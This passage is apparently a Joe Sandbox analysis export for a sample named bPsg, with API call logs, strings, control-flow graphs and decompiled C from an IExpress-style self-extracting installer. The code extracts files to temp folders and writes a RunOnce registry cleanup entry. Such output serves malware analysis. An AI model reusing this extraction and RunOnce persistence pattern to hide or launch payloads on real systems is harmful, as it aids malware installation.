                                                                        0x00f3203c
                                                                        0x00f32041
                                                                        0x00f32050
                                                                        0x00f3205f
                                                                        0x00f32064
                                                                        0x00f3206f
                                                                        0x00f3208c
                                                                        0x00f32094
                                                                        0x00f32257
                                                                        0x00f32266
                                                                        0x00f32266
                                                                        0x00f3209a
                                                                        0x00f3209b
                                                                        0x00f3209d
                                                                        0x00f320aa
                                                                        0x00f320af
                                                                        0x00f320c9
                                                                        0x00f320d1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f320d3
                                                                        0x00f320da
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f320da
                                                                        0x00f320e2
                                                                        0x00f32103
                                                                        0x00f3210e
                                                                        0x00f32116
                                                                        0x00f32122
                                                                        0x00f32128
                                                                        0x00f3212c
                                                                        0x00f32179
                                                                        0x00f32194
                                                                        0x00f321de
                                                                        0x00f321e4
                                                                        0x00f32256
                                                                        0x00f32256
                                                                        0x00000000
                                                                        0x00f32256
                                                                        0x00f32196
                                                                        0x00f32196
                                                                        0x00f3219c
                                                                        0x00f3219f
                                                                        0x00f3219f
                                                                        0x00f321a1
                                                                        0x00f321a2
                                                                        0x00f321a6
                                                                        0x00f321a8
                                                                        0x00f321b0
                                                                        0x00f321b0
                                                                        0x00f321b2
                                                                        0x00f321b3
                                                                        0x00f321bc
                                                                        0x00f321c7
                                                                        0x00f321cb
                                                                        0x00f321f1
                                                                        0x00f321f6
                                                                        0x00f321fd
                                                                        0x00f321ff
                                                                        0x00f321ff
                                                                        0x00f32204
                                                                        0x00f32213
                                                                        0x00f32218
                                                                        0x00f3221d
                                                                        0x00f3221d
                                                                        0x00f32220
                                                                        0x00f32220
                                                                        0x00f32222
                                                                        0x00f32223
                                                                        0x00f32229
                                                                        0x00f3223d
                                                                        0x00f32249
                                                                        0x00f32250
                                                                        0x00000000
                                                                        0x00f32250
                                                                        0x00f321d2
                                                                        0x00f321d9
                                                                        0x00000000
                                                                        0x00f321d9
                                                                        0x00f3213a
                                                                        0x00f32141
                                                                        0x00f32144
                                                                        0x00f3214c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f32163
                                                                        0x00f32172
                                                                        0x00f32172
                                                                        0x00000000
                                                                        0x00f32163
                                                                        0x00f320ea
                                                                        0x00f320f0
                                                                        0x00000000

                                                                        APIs
                                                                        • memset.MSVCRT ref: 00F32050
                                                                        • memset.MSVCRT ref: 00F3205F
                                                                        • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00F3208C
                                                                          • Part of subcall function 00F3171E: _vsnprintf.MSVCRT ref: 00F31750
                                                                        • RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F320C9
                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F320EA
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00F32103
                                                                        • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F32122
                                                                        • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00F32134
                                                                        • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F32144
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00F3215B
                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F3218C
                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F321C1
                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F321E4
                                                                        • RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00F3223D
                                                                        • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F32249
                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F32250
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                        • String ID: %s /D:%s$C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
                                                                        • API String ID: 178549006-1563176777
                                                                        • Opcode ID: 9c5ff04eefb4cc84beae249780d35f78c398a79e5b36d45e530a99b367f29860
                                                                        • Instruction ID: 92ad2031a752d9fcf9a997c2da060b5ec59ea0013302c88a254849d100ead1d1
                                                                        • Opcode Fuzzy Hash: 9c5ff04eefb4cc84beae249780d35f78c398a79e5b36d45e530a99b367f29860
                                                                        • Instruction Fuzzy Hash: A55139B2A00218ABDB64AF20DC49FFB773DEF40770F0441A4F985E3151DAB5DE49AA60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 232 f355a0-f355d9 call f3468f LocalAlloc 235 f355db-f355f1 call f344b9 call f36285 232->235 236 f355fd-f3560c call f3468f 232->236 248 f355f6-f355f8 235->248 241 f35632-f35643 lstrcmpA 236->241 242 f3560e-f35630 call f344b9 LocalFree 236->242 246 f35645 241->246 247 f3564b-f35659 LocalFree 241->247 242->248 246->247 250 f35696-f3569c 247->250 251 f3565b-f3565d 247->251 252 f358b7-f358c7 call f36ce0 248->252 253 f356a2-f356a8 250->253 254 f3589f-f358b5 call f36517 250->254 255 f35669 251->255 256 f3565f-f35667 251->256 253->254 259 f356ae-f356c1 GetTempPathA 253->259 254->252 260 f3566b-f3567a call f35467 255->260 256->255 256->260 263 f356f3-f35711 call f31781 259->263 264 f356c3-f356c9 call f35467 259->264 269 f35680-f35691 call f344b9 260->269 270 f3589b-f3589d 260->270 274 f35717-f35729 GetDriveTypeA 263->274 275 f3586c-f35890 GetWindowsDirectoryA call f3597d 263->275 272 f356ce-f356d0 264->272 269->248 270->252 272->270 276 f356d6-f356df call f32630 272->276 278 f35730-f35740 GetFileAttributesA 274->278 279 f3572b-f3572e 274->279 275->263 289 f35896 275->289 276->263 290 f356e1-f356ed call f35467 276->290 282 f35742-f35745 278->282 283 f3577e-f3578f call f3597d 278->283 279->278 279->282 287 f35747-f3574f 282->287 288 f3576b 282->288 295 f357b2-f357bf call f32630 283->295 296 f35791-f3579e call f32630 283->296 292 f35771-f35779 287->292 293 f35751-f35753 287->293 288->292 289->270 290->263 290->270 298 f35864-f35866 292->298 293->292 297 f35755-f35762 call f36952 293->297 307 f357d3-f357f8 call f3658a GetFileAttributesA 295->307 308 f357c1-f357cd GetWindowsDirectoryA 295->308 296->288 306 f357a0-f357b0 call f3597d 296->306 297->288 309 f35764-f35769 297->309 298->274 298->275 306->288 306->295 314 f3580a 307->314 315 f357fa-f35808 CreateDirectoryA 307->315 308->307 309->283 309->288 316 f3580d-f3580f 314->316 315->316 317 f35811-f35825 316->317 318 f35827-f3585c SetFileAttributesA call f31781 call f35467 316->318 317->298 318->270 323 f3585e 318->323 323->298
                                                                        C-Code - Quality: 92%
                                                                        			E00F355A0(void* __eflags) {
                                                                        				signed int _v8;
                                                                        				char _v265;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t28;
                                                                        				int _t32;
                                                                        				int _t33;
                                                                        				int _t35;
                                                                        				signed int _t36;
                                                                        				signed int _t38;
                                                                        				int _t40;
                                                                        				int _t44;
                                                                        				long _t48;
                                                                        				int _t49;
                                                                        				int _t50;
                                                                        				signed int _t53;
                                                                        				int _t54;
                                                                        				int _t59;
                                                                        				char _t60;
                                                                        				int _t65;
                                                                        				char _t66;
                                                                        				int _t67;
                                                                        				int _t68;
                                                                        				int _t69;
                                                                        				int _t70;
                                                                        				int _t71;
                                                                        				struct _SECURITY_ATTRIBUTES* _t72;
                                                                        				int _t73;
                                                                        				CHAR* _t82;
                                                                        				CHAR* _t88;
                                                                        				void* _t103;
                                                                        				signed int _t110;
                                                                        
                                                                        				_t28 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t28 ^ _t110;
                                                                        				_t2 = E00F3468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                        				_t109 = LocalAlloc(0x40, _t2);
                                                                        				if(_t109 != 0) {
                                                                        					_t82 = "RUNPROGRAM";
                                                                        					_t32 = E00F3468F(_t82, _t109, 1);
                                                                        					__eflags = _t32;
                                                                        					if(_t32 != 0) {
                                                                        						_t33 = lstrcmpA(_t109, "<None>");
                                                                        						__eflags = _t33;
                                                                        						if(_t33 == 0) {
                                                                        							 *0xf39a30 = 1;
                                                                        						}
                                                                        						LocalFree(_t109);
                                                                        						_t35 =  *0xf38b3e; // 0x0
                                                                        						__eflags = _t35;
                                                                        						if(_t35 == 0) {
                                                                        							__eflags =  *0xf38a24; // 0x0
                                                                        							if(__eflags != 0) {
                                                                        								L46:
                                                                        								_t101 = 0x7d2;
                                                                        								_t36 = E00F36517(_t82, 0x7d2, 0, E00F33210, 0, 0);
                                                                        								asm("sbb eax, eax");
                                                                        								_t38 =  ~( ~_t36);
                                                                        							} else {
                                                                        								__eflags =  *0xf39a30; // 0x0
                                                                        								if(__eflags != 0) {
                                                                        									goto L46;
                                                                        								} else {
                                                                        									_t109 = 0xf391e4;
                                                                        									_t40 = GetTempPathA(0x104, 0xf391e4);
                                                                        									__eflags = _t40;
                                                                        									if(_t40 == 0) {
                                                                        										L19:
                                                                        										_push(_t82);
                                                                        										E00F31781( &_v268, 0x104, _t82, "A:\\");
                                                                        										__eflags = _v268 - 0x5a;
                                                                        										if(_v268 <= 0x5a) {
                                                                        											do {
                                                                        												_t109 = GetDriveTypeA( &_v268);
                                                                        												__eflags = _t109 - 6;
                                                                        												if(_t109 == 6) {
                                                                        													L22:
                                                                        													_t48 = GetFileAttributesA( &_v268);
                                                                        													__eflags = _t48 - 0xffffffff;
                                                                        													if(_t48 != 0xffffffff) {
                                                                        														goto L30;
                                                                        													} else {
                                                                        														goto L23;
                                                                        													}
                                                                        												} else {
                                                                        													__eflags = _t109 - 3;
                                                                        													if(_t109 != 3) {
                                                                        														L23:
                                                                        														__eflags = _t109 - 2;
                                                                        														if(_t109 != 2) {
                                                                        															L28:
                                                                        															_t66 = _v268;
                                                                        															goto L29;
                                                                        														} else {
                                                                        															_t66 = _v268;
                                                                        															__eflags = _t66 - 0x41;
                                                                        															if(_t66 == 0x41) {
                                                                        																L29:
                                                                        																_t60 = _t66 + 1;
                                                                        																_v268 = _t60;
                                                                        																goto L42;
                                                                        															} else {
                                                                        																__eflags = _t66 - 0x42;
                                                                        																if(_t66 == 0x42) {
                                                                        																	goto L29;
                                                                        																} else {
                                                                        																	_t68 = E00F36952( &_v268);
                                                                        																	__eflags = _t68;
                                                                        																	if(_t68 == 0) {
                                                                        																		goto L28;
                                                                        																	} else {
                                                                        																		__eflags = _t68 - 0x19000;
                                                                        																		if(_t68 >= 0x19000) {
                                                                        																			L30:
                                                                        																			_push(0);
                                                                        																			_t103 = 3;
                                                                        																			_t49 = E00F3597D( &_v268, _t103, 1);
                                                                        																			__eflags = _t49;
                                                                        																			if(_t49 != 0) {
                                                                        																				L33:
                                                                        																				_t50 = E00F32630(0,  &_v268, 1);
                                                                        																				__eflags = _t50;
                                                                        																				if(_t50 != 0) {
                                                                        																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                        																				}
                                                                        																				_t88 =  &_v268;
                                                                        																				E00F3658A(_t88, 0x104, "msdownld.tmp");
                                                                        																				_t53 = GetFileAttributesA( &_v268);
                                                                        																				__eflags = _t53 - 0xffffffff;
                                                                        																				if(_t53 != 0xffffffff) {
                                                                        																					_t54 = _t53 & 0x00000010;
                                                                        																					__eflags = _t54;
                                                                        																				} else {
                                                                        																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                        																				}
                                                                        																				__eflags = _t54;
                                                                        																				if(_t54 != 0) {
                                                                        																					SetFileAttributesA( &_v268, 2);
                                                                        																					_push(_t88);
                                                                        																					_t109 = 0xf391e4;
                                                                        																					E00F31781(0xf391e4, 0x104, _t88,  &_v268);
                                                                        																					_t101 = 1;
                                                                        																					_t59 = E00F35467(0xf391e4, 1, 0);
                                                                        																					__eflags = _t59;
                                                                        																					if(_t59 != 0) {
                                                                        																						goto L45;
                                                                        																					} else {
                                                                        																						_t60 = _v268;
                                                                        																						goto L42;
                                                                        																					}
                                                                        																				} else {
                                                                        																					_t60 = _v268 + 1;
                                                                        																					_v265 = 0;
                                                                        																					_v268 = _t60;
                                                                        																					goto L42;
                                                                        																				}
                                                                        																			} else {
                                                                        																				_t65 = E00F32630(0,  &_v268, 1);
                                                                        																				__eflags = _t65;
                                                                        																				if(_t65 != 0) {
                                                                        																					goto L28;
                                                                        																				} else {
                                                                        																					_t67 = E00F3597D( &_v268, 1, 1, 0);
                                                                        																					__eflags = _t67;
                                                                        																					if(_t67 == 0) {
                                                                        																						goto L28;
                                                                        																					} else {
                                                                        																						goto L33;
                                                                        																					}
                                                                        																				}
                                                                        																			}
                                                                        																		} else {
                                                                        																			goto L28;
                                                                        																		}
                                                                        																	}
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													} else {
                                                                        														goto L22;
                                                                        													}
                                                                        												}
                                                                        												goto L47;
                                                                        												L42:
                                                                        												__eflags = _t60 - 0x5a;
                                                                        											} while (_t60 <= 0x5a);
                                                                        										}
                                                                        										goto L43;
                                                                        									} else {
                                                                        										_t101 = 1;
                                                                        										_t69 = E00F35467(0xf391e4, 1, 3); // executed
                                                                        										__eflags = _t69;
                                                                        										if(_t69 != 0) {
                                                                        											goto L45;
                                                                        										} else {
                                                                        											_t82 = 0xf391e4;
                                                                        											_t70 = E00F32630(0, 0xf391e4, 1);
                                                                        											__eflags = _t70;
                                                                        											if(_t70 != 0) {
                                                                        												goto L19;
                                                                        											} else {
                                                                        												_t101 = 1;
                                                                        												_t82 = 0xf391e4;
                                                                        												_t71 = E00F35467(0xf391e4, 1, 1);
                                                                        												__eflags = _t71;
                                                                        												if(_t71 != 0) {
                                                                        													goto L45;
                                                                        												} else {
                                                                        													do {
                                                                        														goto L19;
                                                                        														L43:
                                                                        														GetWindowsDirectoryA( &_v268, 0x104);
                                                                        														_push(4);
                                                                        														_t101 = 3;
                                                                        														_t82 =  &_v268;
                                                                        														_t44 = E00F3597D(_t82, _t101, 1);
                                                                        														__eflags = _t44;
                                                                        													} while (_t44 != 0);
                                                                        													goto L2;
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							__eflags = _t35 - 0x5c;
                                                                        							if(_t35 != 0x5c) {
                                                                        								L10:
                                                                        								_t72 = 1;
                                                                        							} else {
                                                                        								__eflags =  *0xf38b3f - _t35; // 0x0
                                                                        								_t72 = 0;
                                                                        								if(__eflags != 0) {
                                                                        									goto L10;
                                                                        								}
                                                                        							}
                                                                        							_t101 = 0;
                                                                        							_t73 = E00F35467(0xf38b3e, 0, _t72);
                                                                        							__eflags = _t73;
                                                                        							if(_t73 != 0) {
                                                                        								L45:
                                                                        								_t38 = 1;
                                                                        							} else {
                                                                        								_t101 = 0x4be;
                                                                        								E00F344B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                        								goto L2;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_t101 = 0x4b1;
                                                                        						E00F344B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        						LocalFree(_t109);
                                                                        						 *0xf39124 = 0x80070714;
                                                                        						goto L2;
                                                                        					}
                                                                        				} else {
                                                                        					_t101 = 0x4b5;
                                                                        					E00F344B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        					 *0xf39124 = E00F36285();
                                                                        					L2:
                                                                        					_t38 = 0;
                                                                        				}
                                                                        				L47:
                                                                        				return E00F36CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                        			}





































                                                                        0x00f355ab
                                                                        0x00f355b2
                                                                        0x00f355c9
                                                                        0x00f355d5
                                                                        0x00f355d9
                                                                        0x00f35600
                                                                        0x00f35605
                                                                        0x00f3560a
                                                                        0x00f3560c
                                                                        0x00f35638
                                                                        0x00f35641
                                                                        0x00f35643
                                                                        0x00f35645
                                                                        0x00f35645
                                                                        0x00f3564c
                                                                        0x00f35652
                                                                        0x00f35657
                                                                        0x00f35659
                                                                        0x00f35696
                                                                        0x00f3569c
                                                                        0x00f3589f
                                                                        0x00f358a7
                                                                        0x00f358ac
                                                                        0x00f358b3
                                                                        0x00f358b5
                                                                        0x00f356a2
                                                                        0x00f356a2
                                                                        0x00f356a8
                                                                        0x00000000
                                                                        0x00f356ae
                                                                        0x00f356ae
                                                                        0x00f356b9
                                                                        0x00f356bf
                                                                        0x00f356c1
                                                                        0x00f356f3
                                                                        0x00f356f3
                                                                        0x00f35705
                                                                        0x00f3570a
                                                                        0x00f35711
                                                                        0x00f35717
                                                                        0x00f35724
                                                                        0x00f35726
                                                                        0x00f35729
                                                                        0x00f35730
                                                                        0x00f35737
                                                                        0x00f3573d
                                                                        0x00f35740
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f3572b
                                                                        0x00f3572b
                                                                        0x00f3572e
                                                                        0x00f35742
                                                                        0x00f35742
                                                                        0x00f35745
                                                                        0x00f3576b
                                                                        0x00f3576b
                                                                        0x00000000
                                                                        0x00f35747
                                                                        0x00f35747
                                                                        0x00f3574d
                                                                        0x00f3574f
                                                                        0x00f35771
                                                                        0x00f35771
                                                                        0x00f35773
                                                                        0x00000000
                                                                        0x00f35751
                                                                        0x00f35751
                                                                        0x00f35753
                                                                        0x00000000
                                                                        0x00f35755
                                                                        0x00f3575b
                                                                        0x00f35760
                                                                        0x00f35762
                                                                        0x00000000
                                                                        0x00f35764
                                                                        0x00f35764
                                                                        0x00f35769
                                                                        0x00f3577e
                                                                        0x00f3577e
                                                                        0x00f35781
                                                                        0x00f35788
                                                                        0x00f3578d
                                                                        0x00f3578f
                                                                        0x00f357b2
                                                                        0x00f357b8
                                                                        0x00f357bd
                                                                        0x00f357bf
                                                                        0x00f357cd
                                                                        0x00f357cd
                                                                        0x00f357dd
                                                                        0x00f357e3
                                                                        0x00f357ef
                                                                        0x00f357f5
                                                                        0x00f357f8
                                                                        0x00f3580a
                                                                        0x00f3580a
                                                                        0x00f357fa
                                                                        0x00f35802
                                                                        0x00f35802
                                                                        0x00f3580d
                                                                        0x00f3580f
                                                                        0x00f35830
                                                                        0x00f35836
                                                                        0x00f3583d
                                                                        0x00f3584b
                                                                        0x00f35851
                                                                        0x00f35855
                                                                        0x00f3585a
                                                                        0x00f3585c
                                                                        0x00000000
                                                                        0x00f3585e
                                                                        0x00f3585e
                                                                        0x00000000
                                                                        0x00f3585e
                                                                        0x00f35811
                                                                        0x00f35817
                                                                        0x00f35819
                                                                        0x00f3581f
                                                                        0x00000000
                                                                        0x00f3581f
                                                                        0x00f35791
                                                                        0x00f35797
                                                                        0x00f3579c
                                                                        0x00f3579e
                                                                        0x00000000
                                                                        0x00f357a0
                                                                        0x00f357a9
                                                                        0x00f357ae
                                                                        0x00f357b0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f357b0
                                                                        0x00f3579e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f35769
                                                                        0x00f35762
                                                                        0x00f35753
                                                                        0x00f3574f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f3572e
                                                                        0x00000000
                                                                        0x00f35864
                                                                        0x00f35864
                                                                        0x00f35864
                                                                        0x00f35717
                                                                        0x00000000
                                                                        0x00f356c3
                                                                        0x00f356c5
                                                                        0x00f356c9
                                                                        0x00f356ce
                                                                        0x00f356d0
                                                                        0x00000000
                                                                        0x00f356d6
                                                                        0x00f356d6
                                                                        0x00f356d8
                                                                        0x00f356dd
                                                                        0x00f356df
                                                                        0x00000000
                                                                        0x00f356e1
                                                                        0x00f356e2
                                                                        0x00f356e4
                                                                        0x00f356e6
                                                                        0x00f356eb
                                                                        0x00f356ed
                                                                        0x00000000
                                                                        0x00f356f3
                                                                        0x00f356f3
                                                                        0x00000000
                                                                        0x00f3586c
                                                                        0x00f35878
                                                                        0x00f3587e
                                                                        0x00f35882
                                                                        0x00f35883
                                                                        0x00f35889
                                                                        0x00f3588e
                                                                        0x00f3588e
                                                                        0x00000000
                                                                        0x00f35896
                                                                        0x00f356ed
                                                                        0x00f356df
                                                                        0x00f356d0
                                                                        0x00f356c1
                                                                        0x00f356a8
                                                                        0x00f3565b
                                                                        0x00f3565b
                                                                        0x00f3565d
                                                                        0x00f35669
                                                                        0x00f35669
                                                                        0x00f3565f
                                                                        0x00f3565f
                                                                        0x00f35665
                                                                        0x00f35667
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f35667
                                                                        0x00f3566c
                                                                        0x00f35673
                                                                        0x00f35678
                                                                        0x00f3567a
                                                                        0x00f3589b
                                                                        0x00f3589b
                                                                        0x00f35680
                                                                        0x00f35685
                                                                        0x00f3568c
                                                                        0x00000000
                                                                        0x00f3568c
                                                                        0x00f3567a
                                                                        0x00f3560e
                                                                        0x00f35613
                                                                        0x00f3561a
                                                                        0x00f35620
                                                                        0x00f35626
                                                                        0x00000000
                                                                        0x00f35626
                                                                        0x00f355db
                                                                        0x00f355e0
                                                                        0x00f355e7
                                                                        0x00f355f1
                                                                        0x00f355f6
                                                                        0x00f355f6
                                                                        0x00f355f6
                                                                        0x00f358b7
                                                                        0x00f358c7

                                                                        APIs
                                                                          • Part of subcall function 00F3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F346A0
                                                                          • Part of subcall function 00F3468F: SizeofResource.KERNEL32(00000000,00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346A9
                                                                          • Part of subcall function 00F3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F346C3
                                                                          • Part of subcall function 00F3468F: LoadResource.KERNEL32(00000000,00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346CC
                                                                          • Part of subcall function 00F3468F: LockResource.KERNEL32(00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346D3
                                                                          • Part of subcall function 00F3468F: memcpy_s.MSVCRT ref: 00F346E5
                                                                          • Part of subcall function 00F3468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346EF
                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00F355CF
                                                                        • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00F35638
                                                                        • LocalFree.KERNEL32(00000000), ref: 00F3564C
                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00F35620
                                                                          • Part of subcall function 00F344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F34518
                                                                          • Part of subcall function 00F344B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F34554
                                                                          • Part of subcall function 00F36285: GetLastError.KERNEL32(00F35BBC), ref: 00F36285
                                                                        • GetTempPathA.KERNEL32(00000104,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\), ref: 00F356B9
                                                                        • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00F3571E
                                                                        • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00F35737
                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00F357CD
                                                                        • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00F357EF
                                                                        • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00F35802
                                                                          • Part of subcall function 00F32630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00F32654
                                                                        • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00F35830
                                                                          • Part of subcall function 00F36517: FindResourceA.KERNEL32(00F30000,000007D6,00000005), ref: 00F3652A
                                                                          • Part of subcall function 00F36517: LoadResource.KERNEL32(00F30000,00000000,?,?,00F32EE8,00000000,00F319E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00F36538
                                                                          • Part of subcall function 00F36517: DialogBoxIndirectParamA.USER32(00F30000,00000000,00000547,00F319E0,00000000), ref: 00F36557
                                                                          • Part of subcall function 00F36517: FreeResource.KERNEL32(00000000,?,?,00F32EE8,00000000,00F319E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00F36560
                                                                        • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00F35878
                                                                          • Part of subcall function 00F3597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00F359A8
                                                                          • Part of subcall function 00F3597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00F359AF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                        • String ID: <None>$A:\$C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                        • API String ID: 2436801531-3110009808
                                                                        • Opcode ID: 0ddaf08c6e905e49657cb5b4d4c349e675e38b8bf9a57584587a90674aa2f20a
                                                                        • Instruction ID: b02e7d50269223b6d6508f368edd06474ef59bfbbe414993ff6cff99cdf6e955
                                                                        • Opcode Fuzzy Hash: 0ddaf08c6e905e49657cb5b4d4c349e675e38b8bf9a57584587a90674aa2f20a
                                                                        • Instruction Fuzzy Hash: CD811DB1E04A089ADB24AB358C85BFE765E9FE0B70F040065F9C6D2191DFB8CDC1BA51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 324 f3597d-f359b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 f359bb-f359d8 call f344b9 call f36285 324->325 326 f359dd-f35a1b GetDiskFreeSpaceA 324->326 343 f35c05-f35c14 call f36ce0 325->343 328 f35ba1-f35bde memset call f36285 GetLastError FormatMessageA 326->328 329 f35a21-f35a4a MulDiv 326->329 338 f35be3-f35bfc call f344b9 SetCurrentDirectoryA 328->338 329->328 332 f35a50-f35a6c GetVolumeInformationA 329->332 335 f35ab5-f35aca SetCurrentDirectoryA 332->335 336 f35a6e-f35ab0 memset call f36285 GetLastError FormatMessageA 332->336 340 f35acc-f35ad1 335->340 336->338 353 f35c02 338->353 341 f35ad3-f35ad8 340->341 342 f35ae2-f35ae4 340->342 341->342 346 f35ada-f35ae0 341->346 348 f35ae7-f35af8 342->348 349 f35ae6 342->349 346->340 346->342 352 f35af9-f35afb 348->352 349->348 355 f35b05-f35b08 352->355 356 f35afd-f35b03 352->356 354 f35c04 353->354 354->343 357 f35b20-f35b27 355->357 358 f35b0a-f35b1b call f344b9 355->358 356->352 356->355 360 f35b52-f35b5b 357->360 361 f35b29-f35b33 357->361 358->353 364 f35b62-f35b6d 360->364 361->360 363 f35b35-f35b50 361->363 363->364 365 f35b76-f35b7d 364->365 366 f35b6f-f35b74 364->366 368 f35b83 365->368 369 f35b7f-f35b81 365->369 367 f35b85 366->367 370 f35b87-f35b94 call f3268b 367->370 371 f35b96-f35b9f 367->371 368->367 369->367 370->354 371->354
                                                                        C-Code - Quality: 96%
                                                                        			E00F3597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
